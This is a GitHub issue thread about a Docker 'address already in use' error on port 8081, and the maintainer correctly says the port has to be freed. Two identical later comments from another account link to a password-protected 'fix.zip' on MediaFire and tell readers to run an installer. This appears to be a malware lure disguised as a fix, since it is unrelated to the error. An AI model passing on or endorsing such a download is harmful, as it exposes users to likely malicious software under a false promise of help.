### ISSUE TITLE
address already in use

### ISSUE THREAD

**Issue by GODIMONGO** [mercurykd/vpnbot#20]
Error response from daemon: driver failed programming external connectivity on endpoint php-1.43 (e0cef927a3081a8c220b79b99ff1d7ed79551c318d6c3f9d107d6b10372df8b4): failed to bind port 127.0.0.1:8081/tcp: Error starting userland proxy: listen tcp4 127.0.0.1:8081: bind: address already in use
make: *** [makefile:6: u] Error 1

**Comment by mercurykd** [comment]
> 127.0.0.1:8081: bind: address already in use

port 8081 is busy, release it

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
